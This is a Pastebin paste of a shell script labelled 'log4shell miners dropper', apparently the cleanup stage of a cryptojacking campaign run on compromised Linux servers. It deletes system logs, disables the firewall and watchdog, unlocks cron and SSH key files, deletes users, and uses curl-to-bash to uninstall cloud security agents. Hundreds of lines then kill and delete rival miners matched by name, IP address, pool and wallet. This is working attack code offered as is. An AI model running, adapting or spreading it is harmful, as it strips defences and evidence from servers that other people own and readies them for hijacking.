Snakelabs

log4shell miners dropper

Dec 10th, 2021 (edited)
1,050
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 33.14 KB | None | 0 0
  1. #!/bin/sh
  2. ulimit -n 65535
  3. rm -rf /var/log/syslog
  4. chattr -iua /tmp/
  5. chattr -iua /var/tmp/
  6. chattr -R -i /var/spool/cron
  7. chattr -i /etc/crontab
  8. ufw disable
  9. iptables -F
  10. echo "nope" >/tmp/log_rot
  11. sudo sysctl kernel.nmi_watchdog=0
  12. echo '0' >/proc/sys/kernel/nmi_watchdog
  13. echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
  14. userdel akay
  15. userdel vfinder
  16. chattr -iae /root/.ssh/
  17. chattr -iae /root/.ssh/authorized_keys
  18. rm -rf /tmp/addres*
  19. rm -rf /tmp/walle*
  20. rm -rf /tmp/keys
  21. if ps aux | grep -i '[a]liyun'; then
  22.   curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  23.   curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  24.   pkill aliyun-service
  25.   rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  26.   rm -rf /usr/local/aegis*
  27.   systemctl stop aliyun.service
  28.   systemctl disable aliyun.service
  29.   service bcm-agent stop
  30.   yum remove bcm-agent -y
  31.   apt-get remove bcm-agent -y
  32. elif ps aux | grep -i '[y]unjing'; then
  33.   /usr/local/qcloud/stargate/admin/uninstall.sh
  34.   /usr/local/qcloud/YunJing/uninst.sh
  35.   /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  36. fi
  37. netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
  38. netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
  39. netstat -anp | grep "207.38.87.6" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  40. netstat -anp | grep "34.81.218.76:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  41. netstat -anp | grep "42.112.28.216:9486" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  42. pkill -f .git/kthreaddw
  43. ps aux | grep "agetty" | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
  44. pkill -f 42.112.28.216
  45.  
  46. netstat -anp | grep "127.0.0.1:52018" | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  47. netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  48. netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  49. netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  50. netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  51. netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  52. netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  53. netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  54. netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  55. netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  56. netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  57. netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  58. netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  59. netstat -anp | grep :14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  60. netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  61. netstat -anp | grep :13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  62. cat /tmp/.X11-unix/01|xargs -I % kill -9 %
  63. cat /tmp/.X11-unix/11|xargs -I % kill -9 %
  64. cat /tmp/.X11-unix/22|xargs -I % kill -9 %
  65. cat /tmp/.pg_stat.0|xargs -I % kill -9 %
  66. cat /tmp/.pg_stat.1|xargs -I % kill -9 %
  67. cat $HOME/data/./oka.pid|xargs -I % kill -9 %
  68. pkill -f 80.211.206.105
  69. pkill -f 207.38.87.6
  70. pkill -f p8444
  71. pkill -f supportxmr
  72. pkill -f monero
  73. pkill -f zsvc
  74. pkill -f pdefenderd
  75. pkill -f updatecheckerd
  76. pkill -f cruner
  77. pkill -f dbused
  78. pkill -f bashirc
  79. pkill -f meminitsrv
  80. pkill -f kthreaddi
  81. pkill -f srv00
  82. pkill -f /tmp/.javae/javae
  83. pkill -f .javae
  84. pkill -f .syna
  85. pkill -f .main
  86. pkill -f xmm
  87. pkill -f solr.sh
  88. pkill -f /tmp/.solr/solrd
  89. pkill -f /tmp/javac
  90. pkill -f /tmp/.go.sh
  91. pkill -f /tmp/.x/agetty
  92. pkill -f /tmp/.x/kworker
  93. pkill -f c3pool
  94. pkill -f /tmp/.X11-unix/gitag-ssh
  95. pkill -f /tmp/1
  96. pkill -f /tmp/okk.sh
  97. pkill -f /tmp/gitaly
  98. pkill -f /tmp/.x/kworker
  99. pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  100. pkill -f /tmp/.X11-unix/supervise
  101. pkill -f /tmp/.ssh/redis.sh
  102. ps aux| grep "./udp"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  103. ps aux| grep "./oka"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  104. ps aux| grep "postgres: autovacum"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  105. ps ax -o command,pid -www| awk 'length($1) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey|grep -v kinsing| awk '{print $2}'|xargs -I % kill -9 %
  106. ps ax -o command,pid -www| awk 'length($1) == 16'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $2}'|xargs -I % kill -9 %
  107. ps ax| awk 'length($5) == 8'|grep -v bin|grep -v "\["|grep -v "("|grep -v "php-fpm"|grep -v proxymap|grep -v postgres|grep -v postgrey| awk '{print $1}'|xargs -I % kill -9 %
  108. ps aux | grep -v grep | grep '/tmp/sscks' | awk '{print $2}' | xargs -I % kill -9 %
  109. ps aux| grep "sleep 60"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  110. ps aux| grep "./crun"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
  111. ps aux | grep -vw kdevtmpfsi | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
  112. ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %
  113. ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
  114. ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %
  115. ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %
  116. ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %
  117. ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %
  118. ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %
  119. ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %
  120. ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %
  121. ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %
  122. ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %
  123. ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %
  124. ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
  125. ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %
  126. ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %
  127. ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %
  128. ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
  129. ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
  130. ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
  131. ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %
  132. ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %
  133. ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %
  134. ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %
  135. ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %
  136. ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %
  137. ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %
  138. ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
  139. ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %
  140. ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %
  141. ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %
  142. ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %
  143. ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %
  144. ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %
  145. ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %
  146. ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %
  147. ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %
  148. ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %
  149. ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %
  150. ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %
  151. ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %
  152. ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %
  153. ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
  154. ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %
  155. ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %
  156. ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %
  157. ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %
  158. ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %
  159. ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %
  160. ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %
  161. ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %
  162. ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %
  163. ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %
  164. ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %
  165. ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %
  166. ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %
  167. ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %
  168. ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %
  169. ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %
  170. ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
  171. ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %
  172. ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %
  173. ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %
  174. ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
  175. ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
  176. ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %
  177. ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %
  178. ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %
  179. ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %
  180. ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %
  181. ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi|grep -v postgresq1 | awk '$3>80.0{print $2}' | xargs -I % kill -9 %
  182. ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %
  183. ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %
  184. ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %
  185. ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %
  186. ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %
  187. ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %
  188. ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %
  189. ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %
  190. ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
  191. ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %
  192. ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %
  193. ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
  194. ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %
  195. ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %
  196. ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %
  197. ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %
  198. ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %
  199. ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  200. ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  201. ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  202. ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  203. ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  204. ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  205. ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  206. ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  207. ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %
  208. ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  209. ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  210. ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  211. ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  212. ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  213. ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  214. ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  215. ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  216. ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  217. ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  218. ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
  219. ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
  220. ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
  221. ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
  222. ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
  223. ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
  224. ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %
  225. ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %
  226. ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %
  227. ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %
  228. ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %
  229. ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %
  230. ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %
  231. ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %
  232. ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %
  233. ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %
  234. ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %
  235. ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %
  236. ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %
  237. ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %
  238. netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  239. netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  240. netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  241. netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  242. netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  243. systemctl stop c3pool_miner.service
  244. pkill -f pastebin
  245. pkill -f ssh-agent
  246. pkill -f 185.193.127.115
  247. pgrep -f monerohash | xargs -I % kill -9 %
  248. pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
  249. pgrep -f xzpauectgr | xargs -I % kill -9 %
  250. pgrep -f slxfbkmxtd | xargs -I % kill -9 %
  251. pgrep -f mixtape | xargs -I % kill -9 %
  252. pgrep -f addnj | xargs -I % kill -9 %
  253. pgrep -f 200.68.17.196 | xargs -I % kill -9 %
  254. pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %
  255. pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %
  256. pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %
  257. pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %
  258. pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %
  259. pgrep -f honvbsasbf.conf | xargs -I % kill -9 %
  260. pgrep -f mqdsflm.cf | xargs -I % kill -9 %
  261. pgrep -f stratum | xargs -I % kill -9 %
  262. pgrep -f lower.sh | xargs -I % kill -9 %
  263. pgrep -f ./ppp | xargs -I % kill -9 %
  264. pgrep -f cryptonight | xargs -I % kill -9 %
  265. pgrep -f ./seervceaess | xargs -I % kill -9 %
  266. pgrep -f ./servceaess | xargs -I % kill -9 %
  267. pgrep -f ./servceas | xargs -I % kill -9 %
  268. pgrep -f ./servcesa | xargs -I % kill -9 %
  269. pgrep -f ./vsp | xargs -I % kill -9 %
  270. pgrep -f ./jvs | xargs -I % kill -9 %
  271. pgrep -f ./pvv | xargs -I % kill -9 %
  272. pgrep -f ./vpp | xargs -I % kill -9 %
  273. pgrep -f ./pces | xargs -I % kill -9 %
  274. pgrep -f ./rspce | xargs -I % kill -9 %
  275. pgrep -f ./haveged | xargs -I % kill -9 %
  276. pgrep -f ./jiba | xargs -I % kill -9 %
  277. pgrep -f ./watchbog | xargs -I % kill -9 %
  278. pgrep -f ./A7mA5gb | xargs -I % kill -9 %
  279. pgrep -f kacpi_svc | xargs -I % kill -9 %
  280. pgrep -f kswap_svc | xargs -I % kill -9 %
  281. pgrep -f kauditd_svc | xargs -I % kill -9 %
  282. pgrep -f kpsmoused_svc | xargs -I % kill -9 %
  283. pgrep -f kseriod_svc | xargs -I % kill -9 %
  284. pgrep -f kthreadd_svc | xargs -I % kill -9 %
  285. pgrep -f ksoftirqd_svc | xargs -I % kill -9 %
  286. pgrep -f kintegrityd_svc | xargs -I % kill -9 %
  287. pgrep -f jawa | xargs -I % kill -9 %
  288. pgrep -f oracle.jpg | xargs -I % kill -9 %
  289. pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %
  290. pgrep -f 188.209.49.54 | xargs -I % kill -9 %
  291. pgrep -f 181.214.87.241 | xargs -I % kill -9 %
  292. pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %
  293. pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %
  294. pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %
  295. pgrep -f servim | xargs -I % kill -9 %
  296. pgrep -f kblockd_svc | xargs -I % kill -9 %
  297. pgrep -f native_svc | xargs -I % kill -9 %
  298. pgrep -f ynn | xargs -I % kill -9 %
  299. pgrep -f 65ccEJ7 | xargs -I % kill -9 %
  300. pgrep -f jmxx | xargs -I % kill -9 %
  301. pgrep -f 2Ne80nA | xargs -I % kill -9 %
  302. pgrep -f sysstats | xargs -I % kill -9 %
  303. pgrep -f systemxlv | xargs -I % kill -9 %
  304. pgrep -f watchbog | xargs -I % kill -9 %
  305. pgrep -f OIcJi1m | xargs -I % kill -9 %
  306. pkill -f biosetjenkins
  307. pkill -f Loopback
  308. pkill -f apaceha
  309. pkill -f cryptonight
  310. pkill -f stratum
  311. pkill -f mixnerdx
  312. pkill -f performedl
  313. pkill -f JnKihGjn
  314. pkill -f irqba2anc1
  315. pkill -f irqba5xnc1
  316. pkill -f irqbnc1
  317. pkill -f ir29xc1
  318. pkill -f conns
  319. pkill -f irqbalance
  320. pkill -f crypto-pool
  321. pkill -f XJnRj
  322. pkill -f mgwsl
  323. pkill -f pythno
  324. pkill -f jweri
  325. pkill -f lx26
  326. pkill -f NXLAi
  327. pkill -f BI5zj
  328. pkill -f askdljlqw
  329. pkill -f minerd
  330. pkill -f minergate
  331. pkill -f Guard.sh
  332. pkill -f ysaydh
  333. pkill -f bonns
  334. pkill -f donns
  335. pkill -f kxjd
  336. pkill -f Duck.sh
  337. pkill -f bonn.sh
  338. pkill -f conn.sh
  339. pkill -f kworker34
  340. pkill -f kw.sh
  341. pkill -f pro.sh
  342. pkill -f polkitd
  343. pkill -f acpid
  344. pkill -f icb5o
  345. pkill -f nopxi
  346. pkill -f irqbalanc1
  347. pkill -f minerd
  348. pkill -f i586
  349. pkill -f gddr
  350. pkill -f mstxmr
  351. pkill -f ddg.2011
  352. pkill -f wnTKYg
  353. pkill -f deamon
  354. pkill -f disk_genius
  355. pkill -f sourplum
  356. pkill -f polkitd
  357. pkill -f nanoWatch
  358. pkill -f zigw
  359. pkill -f devtool
  360. pkill -f devtools
  361. pkill -f systemctI
  362. pkill -f watchbog
  363. pkill -f cryptonight
  364. pkill -f sustes
  365. pkill -f xmrig
  366. pkill -f xmrig-cpu
  367. pkill -f 121.42.151.137
  368. pkill -f sysguard
  369. pkill -f networkservice
  370. pkill -f sysupdate
  371. pkill -f phpguard
  372. pkill -f phpupdate
  373. pkill -f networkmanager
  374. pkill -f /tmp/init12.cfg
  375. pkill -f kieuanilam.me
  376. pkill -f init12.cfg
  377. pkill -f nginxk
  378. pkill -f tmp/wc.conf
  379. pkill -f xmrig-notls
  380. pkill -f xmr-stak
  381. pkill -f suppoie
  382. pkill -f zer0day.ru
  383. pkill -f dbus-daemon--system
  384. pkill -f nullcrew
  385. pkill -f systemctI
  386. pkill -f kworkerds
  387. pkill -f init10.cfg
  388. pkill -f /wl.conf
  389. pkill -f crond64
  390. pkill -f sustse
  391. pkill -f vmlinuz
  392. pkill -f exin
  393. pkill -f apachiii
  394. rm -rf /usr/bin/config.json
  395. rm -rf /usr/bin/exin
  396. killall log_rot
  397. pkill -f log_rot
  398. rm -rf /tmp/wc.conf
  399. rm -rf /tmp/log_rot
  400. rm -rf /tmp/apachiii
  401. rm -rf /tmp/sustse
  402. rm -rf /tmp/php
  403. rm -rf /tmp/p2.conf
  404. rm -rf /tmp/pprt
  405. rm -rf /tmp/ppol
  406. rm -rf /tmp/javax/config.sh
  407. rm -rf /tmp/javax/sshd2
  408. rm -rf /tmp/.profile
  409. rm -rf /tmp/1.so
  410. rm -rf /tmp/kworkerds
  411. rm -rf /tmp/kworkerds3
  412. rm -rf /tmp/kworkerdssx
  413. rm -rf /tmp/xd.json
  414. rm -rf /tmp/syslogd
  415. rm -rf /tmp/syslogdb
  416. rm -rf /tmp/65ccEJ7
  417. rm -rf /tmp/jmxx
  418. rm -rf /tmp/2Ne80nA
  419. rm -rf /tmp/dl
  420. rm -rf /tmp/ddg
  421. rm -rf /tmp/systemxlv
  422. rm -rf /tmp/systemctI
  423. rm -rf /tmp/.abc
  424. rm -rf /tmp/osw.hb
  425. rm -rf /tmp/.tmpleve
  426. rm -rf /tmp/.tmpnewzz
  427. rm -rf /tmp/.java
  428. rm -rf /tmp/.omed
  429. rm -rf /tmp/.tmpc
  430. rm -rf /tmp/.tmpleve
  431. rm -rf /tmp/.tmpnewzz
  432. rm -rf /tmp/gates.lod
  433. rm -rf /tmp/conf.n
  434. rm -rf /tmp/update.sh
  435. rm -rf /tmp/devtool
  436. rm -rf /tmp/devtools
